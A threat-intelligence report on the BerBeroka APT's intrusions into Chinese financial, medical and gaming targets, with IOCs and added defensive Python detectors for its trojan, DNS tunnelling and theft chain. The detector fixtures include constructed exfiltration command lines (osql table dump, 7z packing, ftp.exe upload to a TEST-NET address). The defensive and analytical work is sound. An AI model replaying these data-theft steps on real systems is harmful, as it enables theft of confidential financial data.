Overview
Since 2022, the BerBeroka group has been mentioned in every annual report released by the QiAnXin Threat Intelligence Center. The group was disclosed by our friendly company Trend Micro [1]; after merging internal groups, we have continued to track it under this name. In fact, BerBeroka is the same group as DRBControl [2] and TAG33. It has intruded into China's financial, hospital and medical, and gaming industries, with a scale of victims far exceeding that of APT-Q-29 [3] and BlackTech [4], which we disclosed previously. This type of attack is different from the black industry of delivering XXX.exe into WeChat groups: the outsourced attackers themselves have very rich intrusion experience at home and abroad, and the offensive desire and intensity they show in activities tied to their own financial income far exceed those of ordinary overseas APT groups.
Historically, QiAnXin Threat Intelligence Center disclosed the GoldenEye Operation in 2015. The target of the attack was also the core business servers of financial institutions to obtain securities trading data and ultimately obtain huge economic benefits through information advantages.
Back in 2020, with the arrival of the COVID-19 pandemic, sharp fluctuations in the domestic securities and fund markets made the attackers eager to know future market trends in order to protect their principal. BerBeroka's launch of Operation Giant is thus in line with objective historical laws. In addition to attacks on core server areas, we also observed that the personal terminals of some top fund managers were controlled; the attackers wanted to obtain the fund portfolios and investment strategies of these financial elites.
We recommend that financial customers deploy TianQing EDR in both office and server areas and enable the cloud check function to defend against unknown threats.
Techniques and tactics
Unlike GoldenEye, which spread through USB flash drives, BerBeroka deploys multiple scanners such as Nessus, AWVS, and QingScan on its own infrastructure to support its huge scanning needs. It exploits RCE vulnerabilities and 0day vulnerabilities in self-developed web systems to compromise border servers. When the target is a personal terminal, it delivers a spear phishing email.
Medialoader
The BerBeroka group drops the second-stage MSI payload by compromising the website of a domestic law firm.
It uses its signature Medialoader to load Servantshell in memory.
There are many Medialoader variants. For example, the 2020 Loader shown below loads PlugX in memory:
To bypass traffic detection, the attackers change C2 and Loader regularly every year. The Medialoader from the end of 2022 added a multi-layer memory loading process.
7zasrv.exe loads 7z.dll only when the x command is executed. The attacker patched an export function in 7z.dll so that it reads the cli.data file and loads the PlugX backdoor in memory.
By 2023, BerBeroka had begun replacing PlugX and Servantshell in the server area with its own special trojans.
Special Trojans
We identified two types of special trojans on the domain controller. The first is written in Golang, and we named it CLMPSUZ. Its core functions are as follows:
| Instruction | Function |
|---|---|
| RepOnline | Check whether the implant is online |
| CmdExecStart | Start CMD |
| CMDExecContent | Execute a CMD command |
| HeartBeatSned | Send heartbeat packets |
| UploadFileStart | Upload the specified file; the upload is ended with UploadFileFinish |
| DownloadFileStart | Download a file; the download is ended with DownloadFileFinish |
| ExitAll | End the process |
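The instruction names in the table are plain strings inside the Go binary, so a simple string-set check is a practical first triage step for hunting CLMPSUZ on suspected hosts. The following is an added example written for this article, not QiAnXin's tooling and not code from the attacker; the instruction names are the ones listed above, while the sample blobs, the threshold of four distinct names, and the UTF-16 check for a hypothetical non-Go port are assumptions made here.

```python
"""Added example (not QiAnXin's code): string-set triage for the CLMPSUZ Go
trojan. The instruction names are the ones in the table above; the sample
blobs below are constructed and do not come from a real sample."""
from typing import Iterable

# Command vocabulary from the report's CLMPSUZ table. "HeartBeatSned" keeps
# the spelling shown there, since that is the literal the implant would carry.
CLMPSUZ_INSTRUCTIONS = (
    "RepOnline", "CmdExecStart", "CMDExecContent", "HeartBeatSned",
    "UploadFileStart", "UploadFileFinish",
    "DownloadFileStart", "DownloadFileFinish", "ExitAll",
)


def find_instructions(blob: bytes) -> set[str]:
    """Return the instruction names present in a file or memory dump.
    Go binaries store strings as plain bytes; the UTF-16-LE form is also
    checked in case the vocabulary is reused in a Win32/.NET port (assumption)."""
    found = set()
    for name in CLMPSUZ_INSTRUCTIONS:
        if name.encode("ascii") in blob or name.encode("utf-16-le") in blob:
            found.add(name)
    return found


def is_clmpsuz_candidate(blob: bytes, min_hits: int = 4) -> bool:
    """Several distinct names are required so that a generic token such as
    'ExitAll' in an unrelated program does not produce a hit on its own."""
    return len(find_instructions(blob)) >= min_hits


def triage(samples: dict[str, bytes]) -> dict[str, set[str]]:
    """Map sample name -> matched instruction names for every candidate."""
    return {
        name: find_instructions(data)
        for name, data in samples.items()
        if is_clmpsuz_candidate(data)
    }


# Constructed stand-ins: a Go-like blob carrying the command table, a Go
# program that merely shares one word, and a UTF-16 variant.
SAMPLE_IMPLANT = (
    b"Go build ID: \"constructed\"\x00runtime.main\x00"
    b"RepOnline\x00CmdExecStart\x00CMDExecContent\x00HeartBeatSned\x00"
    b"UploadFileStart\x00UploadFileFinish\x00DownloadFileStart\x00"
    b"DownloadFileFinish\x00ExitAll\x00main.handleTask\x00"
)
SAMPLE_BENIGN = b"Go build ID: \"constructed\"\x00net/http.(*Server).Serve\x00ExitAll\x00"
SAMPLE_UTF16 = "RepOnline\0CmdExecStart\0CMDExecContent\0ExitAll\0".encode("utf-16-le")

if __name__ == "__main__":
    samples = {"implant.bin": SAMPLE_IMPLANT,
               "benign.bin": SAMPLE_BENIGN,
               "port.bin": SAMPLE_UTF16}
    for name, hits in triage(samples).items():
        print(f"{name}: {sorted(hits)}")
```

Run it against files or process memory dumps read as bytes; the four-hit floor keeps a lone generic word from raising an alert, and any candidate should still be confirmed by the MD5 list in the IOC section or by sandbox analysis.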
The other type of special trojan is actually based on the Ghost remote control protocol, with a new communication module added to talk to other modules.
The keylogging module is placed in an export function so that it can be called easily once the DLL is loaded in memory.
DNS Tunneling
BerBeroka used DNS tunneling to retrieve the second-stage payload during lateral movement against the hospital.
After decryption, MSF (Metasploit Framework) shellcode is loaded into memory for remote control. In 2024, MSF was replaced with the modified Ghost remote control, and various types of loaders were delivered from different servers within the same intranet.
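Retrieving a payload over DNS leaves a recognisable footprint in resolver logs: one domain receives many queries, nearly every query carries a different long, high-entropy subdomain, and TXT or NULL records are favoured because they carry more data per answer. The following detector is an added example written for this article, not QiAnXin's code and not derived from a real BerBeroka sample. The log format, the domains (`example.com`, `example.org`), the client addresses and the thresholds are all constructed assumptions; the encoded-looking labels are SHA-256 prefixes standing in for chunked payload.

```python
"""Added example (not QiAnXin's code): score DNS query logs for tunnelling
behaviour of the kind described above. The log format and all records are
constructed; thresholds are starting points, not values from the report."""
import hashlib
import math
from collections import defaultdict
from typing import Iterable


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payload labels score far above words."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Simplified: last two labels. Use a public-suffix list in production."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def parse_log(lines: Iterable[str]):
    """Constructed format: '<timestamp> <client> <qname> <qtype>'."""
    for line in lines:
        parts = line.split()
        if len(parts) >= 4:
            yield parts[1], parts[2].rstrip(".").lower(), parts[3].upper()


def profile_domains(lines: Iterable[str]) -> dict[str, dict]:
    """Aggregate, per registered domain, the features a tunnel leaves behind:
    many unique subdomains, long high-entropy leftmost labels, TXT/NULL types."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "label_len": 0, "entropy": 0.0, "txt": 0})
    for _client, qname, qtype in parse_log(lines):
        dom = registered_domain(qname)
        sub = qname[: -len(dom) - 1] if qname.endswith("." + dom) else ""
        first = sub.split(".")[0]           # leftmost label carries the data
        s = stats[dom]
        s["queries"] += 1
        s["subdomains"].add(sub)
        s["label_len"] += len(first)
        s["entropy"] += shannon_entropy(first)
        s["txt"] += qtype in ("TXT", "NULL")
    return stats


def tunneling_candidates(lines, min_queries=8, min_unique_ratio=0.9,
                         min_avg_len=20, min_avg_entropy=3.0) -> list[str]:
    """Domains whose traffic looks like chunked payload retrieval."""
    out = []
    for dom, s in profile_domains(lines).items():
        q = s["queries"]
        if q < min_queries:
            continue
        if (len(s["subdomains"]) / q >= min_unique_ratio
                and s["label_len"] / q >= min_avg_len
                and s["entropy"] / q >= min_avg_entropy):
            out.append(dom)
    return sorted(out)


# Constructed log: ten chunk requests whose labels imitate hex-encoded payload
# (sha256 prefixes stand in for the encoded data), plus ordinary lookups.
_TUNNEL = [
    f"2024-03-01T02:1{i}:00Z 10.20.0.15 "
    f"{hashlib.sha256(f'chunk{i}'.encode()).hexdigest()[:40]}.u.example.com TXT"
    for i in range(10)
]
_BENIGN = [
    f"2024-03-01T02:1{i % 10}:30Z 10.20.0.{30 + i % 3} {name}.example.org A"
    for i, name in enumerate(["www", "mail", "www", "login", "www",
                              "mail", "cdn", "www", "login", "www"])
]
SAMPLE_DNS_LOG = _TUNNEL + _BENIGN

if __name__ == "__main__":
    print("tunnelling candidates:", tunneling_candidates(SAMPLE_DNS_LOG))
```

The three thresholds are deliberately conservative so that CDNs and cloud services with many hostnames do not trigger; tune them on a baseline of the organisation's own resolver logs, and treat the `txt` counter as a secondary signal rather than a requirement, since A-record tunnels exist as well.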
Lateral movement
BerBeroka uses the lcx tool, packed with Themida, to forward ports inside the intranet. As a hacker tool born in the early 21st century, lcx is rarely seen in today's in-the-wild attacks.
On the Exchange server, during lateral movement, a service named MicroControl was created. Continuous control over the server was achieved by chaining ngrok with Radmin. The service execution chain is as follows:
Stealing Data
Unlike BlackTech, BerBeroka did not use the Plead trojan to distribute Python plug-ins that connect to the database, pull the data, and send it to a specified mailbox via SMTP.
The attacker chose the most primitive method: executing SQL statements through osql.exe to extract the target data, packaging it into a compressed archive, and then transferring it to its own C2 server over FTP.
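Because the theft runs through three ordinary Windows programs in sequence, the most reliable detection is a correlation rule rather than a single-process alert: an osql.exe (or sqlcmd.exe) run, followed on the same host within a short window by an archiver, followed by an FTP client. The code below is an added example written for this article, not QiAnXin's rule set and not code from the attacker. The event format, host names, user names and addresses (192.0.2.0/24 is TEST-NET) are constructed, and the 30-minute window and the image-name lists for each stage are assumptions.

```python
"""Added example (not QiAnXin's code): correlate process-creation events into
the osql.exe -> archive -> FTP exfiltration chain described above. The event
format, host names and addresses are constructed (192.0.2.0/24 is TEST-NET)."""
from datetime import datetime, timedelta
from typing import Iterable


# Stage matchers: image names that typically fill each role in the chain
# (lists are assumptions; extend them from your own baseline).
def _is_sql_export(image: str, cmdline: str) -> bool:
    return image in ("osql.exe", "sqlcmd.exe")


def _is_archive(image: str, cmdline: str) -> bool:
    return image in ("7z.exe", "rar.exe", "winrar.exe", "makecab.exe")


def _is_ftp_upload(image: str, cmdline: str) -> bool:
    return image == "ftp.exe" or "ftp://" in cmdline.lower()


STAGES = (("sql_export", _is_sql_export),
          ("archive", _is_archive),
          ("ftp_upload", _is_ftp_upload))


def parse_events(lines: Iterable[str]) -> list[dict]:
    """Constructed format: '<iso time>|<host>|<user>|<image>|<cmdline>'."""
    events = []
    for line in lines:
        ts, host, user, image, cmdline = line.split("|", 4)
        events.append({"time": datetime.fromisoformat(ts), "host": host,
                       "user": user, "image": image.lower(), "cmdline": cmdline})
    return sorted(events, key=lambda e: (e["host"], e["time"]))


def _next_match(events, start_idx, deadline, match):
    """Index of the first event at or after start_idx that matches before
    the deadline, else None (events are time-ordered per host)."""
    for j in range(start_idx, len(events)):
        e = events[j]
        if e["time"] > deadline:
            return None
        if match(e["image"], e["cmdline"]):
            return j
    return None


def find_exfil_chains(lines, window_minutes: int = 30) -> list[dict]:
    """For every host, look for the three stages in order, all within the
    window measured from the SQL export; later stages must follow earlier ones."""
    chains = []
    by_host: dict[str, list[dict]] = {}
    for ev in parse_events(lines):
        by_host.setdefault(ev["host"], []).append(ev)
    for host, events in by_host.items():
        for i, start in enumerate(events):
            if not STAGES[0][1](start["image"], start["cmdline"]):
                continue
            deadline = start["time"] + timedelta(minutes=window_minutes)
            chain = {"host": host, "user": start["user"], "sql_export": start["time"]}
            cursor = i + 1
            for name, match in STAGES[1:]:
                j = _next_match(events, cursor, deadline, match)
                if j is None:
                    break
                chain[name] = events[j]["time"]
                cursor = j + 1
            else:
                chains.append(chain)
    return chains


# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    # FIN-DB01: query dump, compression, FTP push within a few minutes
    "2024-04-02T01:00:10|FIN-DB01|svc_backup|osql.exe|osql.exe -E -Q \"select * from dbo.Positions\" -o C:\\Windows\\Temp\\p.txt",
    "2024-04-02T01:02:40|FIN-DB01|svc_backup|7z.exe|7z.exe a C:\\Windows\\Temp\\p.7z C:\\Windows\\Temp\\p.txt",
    "2024-04-02T01:05:05|FIN-DB01|svc_backup|ftp.exe|ftp.exe -s:C:\\Windows\\Temp\\f.txt 192.0.2.10",
    # FIN-DB02: a DBA running osql with no follow-on stages
    "2024-04-02T09:15:00|FIN-DB02|dba01|osql.exe|osql.exe -E -Q \"select count(*) from dbo.Trades\"",
    "2024-04-02T09:16:00|FIN-DB02|dba01|notepad.exe|notepad.exe C:\\Users\\dba01\\notes.txt",
    # FIN-FS01: scheduled archive and FTP with no SQL export in front of it
    "2024-04-02T03:00:00|FIN-FS01|svc_backup|7z.exe|7z.exe a D:\\Backup\\logs.7z D:\\Logs",
    "2024-04-02T03:01:00|FIN-FS01|svc_backup|ftp.exe|ftp.exe -s:D:\\Backup\\push.txt 10.0.5.9",
    # FIN-DB03: export and archive, but the FTP step falls outside the window
    "2024-04-02T12:00:00|FIN-DB03|svc_backup|osql.exe|osql.exe -E -i C:\\jobs\\report.sql -o C:\\jobs\\report.txt",
    "2024-04-02T12:03:00|FIN-DB03|svc_backup|7z.exe|7z.exe a C:\\jobs\\report.7z C:\\jobs\\report.txt",
    "2024-04-02T13:10:00|FIN-DB03|svc_backup|ftp.exe|ftp.exe -s:C:\\jobs\\push.txt 10.0.5.9",
]

if __name__ == "__main__":
    for chain in find_exfil_chains(SAMPLE_EVENTS):
        print(chain)
```

Widening the window trades precision for recall: with the default 30 minutes only FIN-DB01 is reported, while two hours would also catch FIN-DB03. In practice the FTP stage is the highest-value signal, since FTP from a database server to an external address should already be blocked at the border, and the correlation mainly tells the responder which export and archive to collect.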
A comparison of the APT groups targeting the financial industry is as follows:
| Group Name | Arms | Hacking Tools | Lateral movement target | Target Industry |
|---|---|---|---|---|
| APT-Q-29 | Special trojans, Cobalt Strike, Zxshell, rootkit | VMP, legitimate signatures, SharpChromium | Domain controller, operations and maintenance | Games, finance, Internet |
| BlackTech | Plead, Python plugin | Plink port forwarding, legitimate signatures | Intranet database account passwords, office area | Finance |
| BerBeroka | CLMPSUZ, Ghost, Cobalt Strike | Lcx, unknown red team forwarding tools, Nessus, AWVS, QingScan | Exchange server, operations and maintenance | Finance, Internet, games, media, Southeast Asian gaming |
Scope of damage
Based on QiAnXin telemetry data, the domestic victim distribution is as follows; the main affected industries are concentrated in the financial sector:
Trend
In the past two years, we have found more and more targeted attacks on government and enterprise endpoints in hospitals, medical care, finance and other industries. The fundamental purpose is to profit from data, but the methods and processes differ slightly. We divide these dozens of attack sets into the following three categories:
| Category | Intrusion method | Attack techniques | Attacker's purpose | Affected business scope |
|---|---|---|---|---|
| Low-end black industry | Deliver XXX.exe to WeChat groups | Crude | After controlling the target's financial terminal, organize a group to commit fraud | Personal financial terminals |
| Mid-range penetration | Nday vulnerabilities, spear phishing emails | The penetration process is relatively rough | Extract data from intranet servers for profit | Operations and maintenance personal terminals and the server area |
| High-end APT (BerBeroka, BlackTech, APT-Q-29) | 0day/Nday, spear phishing emails | Carried out by experienced outsourced personnel; the overall attack chain is concise and efficient, making it hard to detect | Control intranet servers for a long time and continuously steal first-hand data | Operations and maintenance personal terminals and core business server areas |
Regardless of how advanced the attack technology is, all three types of attackers can achieve their respective goals through their own methods. From the perspective of intranet security construction, the harm that the mid-range penetration type does to the intranet cannot be ignored. In one mid-range penetration case, we observed that the attacker installed a WeChat chat-record decryption plug-in on the IT operations and maintenance machine and monitored the content of the target unit's operations and maintenance group chat for a long time to obtain initial access to the server area, which had a great impact on the customer's intranet security:
Summary
At present, the full range of products based on threat intelligence data from QiAnXin Threat Intelligence Center, including QiAnXin Threat Intelligence Platform (TIP), TianQing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, QiAnXin Situation Awareness, etc., already support accurate detection of such attacks.
IOC
MD5:
a8992ddf77aee38c6a4508f69fe3a25b
1ec8c80c529524b9c0bcf59bd1a3f936
0a60825603d955caf2fb7a4349fb2bd1
e129e15d2f7939a738c8caddfe081f18
a5dcabb0c2b7e3a9d0dcdecbba661291
Reference Links
[1] https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/exposing-earth-berberoka-a-multiplatform-apt-campaign-targeting-online-gambling-sites
[2] https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia
[3] https://ti.qianxin.com/blog/articles/the-electronic-party-of-borderless-hackers/
[4] https://ti.qianxin.com/uploads/2023/03/20/396eaf4482e610119ce0cdcd7526c945.pdf